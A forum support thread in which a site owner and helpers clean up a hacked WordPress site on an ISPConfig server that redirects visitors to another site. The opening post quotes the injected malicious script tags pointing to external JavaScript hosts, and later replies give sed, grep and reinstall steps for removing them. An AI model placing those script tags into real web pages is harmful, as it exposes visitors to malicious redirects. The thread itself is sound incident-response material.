Wordpress site hacked on ISPConfig 3 server and automatically redirects to another site

One of the websites (wordpress) on ISPConfig 3 server got hacked and automatically redirected to another site. I think it happened on 4/24/2020. I had setup daily backup on this website, so i cannot restore it with clean version, because I realized late site was hacked. I purchased and ran ISP-PROTECT for entire server, which did not find any malware for this website (/var/www/clients/client2/web16). Many PHP files have the following injection

<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>

Error log is currently 0kb. i had some odd jobs in /var/www which i killed/deleted, because server was showing low resources.

I'm trying to find out how to stop the bleeding and fix the website.
I cannot access wp-admin or website, it redirects.
Thanks in advance if anyone could help i would appreciate
also if you need more details pls let me know

 

No changes to any settings. SSL & Let's Encrypt SSL was checked under Sites > website 16

 

Have a look here: https://wordpress.org/support/topic/hacked-138/
A solution to restore your site is given.

Make sure when copy'n pasting the commands you have the right " and '
Sometimes they get corrupted when copying.
Be aware, that this only brings your site back and does not fix the initial problem. You should also consider that the attacker had access to your database and all your stored data / passwords of that user could be exposed.

In general, for a hacked Wordpress site, follow: https://wordpress.org/support/article/faq-my-site-was-hacked/

 

Thanks @Steini86
I came across both pages you listed in your post, with no luck to access website wordpress backend.

I'm not successful with following command (I changed " and ')

when I issue command:

find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g&#8221; {} +

i get

>

I have to CRTL+C to exit from >

As soon as I found out the issue, i changed password for FTP/DB, I don't see any users created in table wp_users, siteurl was correct in wp_options table (viewing in phpmyadmin)

Any other suggestions?

 

The command has an opening ", but no closing. That is why you get this behavior.
I am not really an expert, but you could try

Code:

find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g&#8221;" {} +

The alternative is to execute just "find . -name "index.php" and edit each file by hand.

 

Thanks again!

When i issue:

find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g&#8221;" {} +

i get

sed: -e expression #1, char 94: unknown option to `s

command
find . -name "index.php
lists
150 index.php files within website folder /var/www/clients/client2/web16/web

 

There is syntax error in sed command, probably at or around character position 94 of the command.
You must figure out how to fix that error, read sed manual page or instructions from Internet.
Or use some programming or script language you do know, and program the character string search and relpace with that.

 

change the salts in wp-config.php
change any author/editor/admin users (or make them change them) passwords in wordpress.
if you don't already, configure fail2ban to block too many failed login attempts on wp-login.php and xmlrpc.php
(be careful with this config, the forgot password and register urls are appended as wp-login.php?******* so don't just block on the wp-login.php string, or it could block an ip for a single login failure.) or us wordfence or similar to do the same thing.
if xmlrpc isn't needed/used on the site, then block/disable it and jetpack.

 

Try

Code:

find . -name "index.php" -exec sed -i  "s%<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>%%" {} +

Warning: Untested! I would suggest to copy one of the malicious files in a new folder and try the script there.
There are tons of sed tutorials out there and you can try your regular expressions here: https://regex101.com/
Good luck!

 

thanks @nhybgtvfr & @Steini86

I tested & ran
find . -name "index.php" -exec sed -i "s%<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>%%" {} +

it worked (thanks so much)
it cleared the line from top of each index.php file
however, if i go to mydomain.com or mydomain.com/wp-admin i still get redirect

 

Could be caching issue. Have you tried with browser in private mode?

 

Sorry no luck with browser in private mode, same issue, still redirects.

 

Then somewhere is still a redirect configured. You can search for the redirect for example with grep:

Code:

grep -rli "stivenfernando.com" /var/www/hackedWordpress/web

Could also be in the hidden .htaccess files

You should extract your data and make a clean re-installation

 

thanks @Steini86
I found 20 files "._index.php" and 15 files "awsindex.html" cleaned them, still redirects.
how do i extract DATA,
this site has bookly plugin for booking
besides that, its pretty much simple 5 page website.

 

These files were removed at point 2 of first post
Have you tried in (new) private mode?

Note that I do not use wordpress. For detailed instructions it is best to refer to the Wordpress site/forum: https://wordpress.org/support/article/faq-my-site-was-hacked/
https://wordpress.org/tags/hacked
https://wordpress.org/tags/malware

 

I tried private mode, still redirects. I already checked 3 links you mention, they have no solution.

 

copy your uploads folder, wp-config.php, and .htaccess into /private.
mysqldump your database into /private, usie the --extended-insert=false option, makes it easier to read if you need to look at it manually.
drop the database, create a new blank database.
clear out /web of everything except the stats folder and the errors folder. make sure you delete all the hidden files as well.
download and extract a clean wordress to the original location.
check wp-config.php and .htaccess files are clean, and move them back to it's original location.
run the same regex script you used on index.php on the database dump.
check the database dump for strings like base64, eval, and decode.
if there are any, check them carefully, they may be malicious, they may be legit. delete the malicious ones.
copy the /private/uploads folder back into the wp-content folder
to make sure all files/folderss still have correct permissions and ownership, cd into /web and :
find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \;
chown -R <webid><clientid> *

import the database
re-install the wordpress theme and plugins.
you should also check that everything in the errors and stats folders are clean as well.


you may also want to consider running that regex against all the files, not just instances of index.php, or just php files.
these bastards have a tendency to add these bits of script calls and base64 encoded mess all over the place, and to hide php script file as image files...

 

Any advice on how to find redirect injected in the database. Wp_options table site_url is correct, i tried searching entire DB for "stivenfernando" nothing found.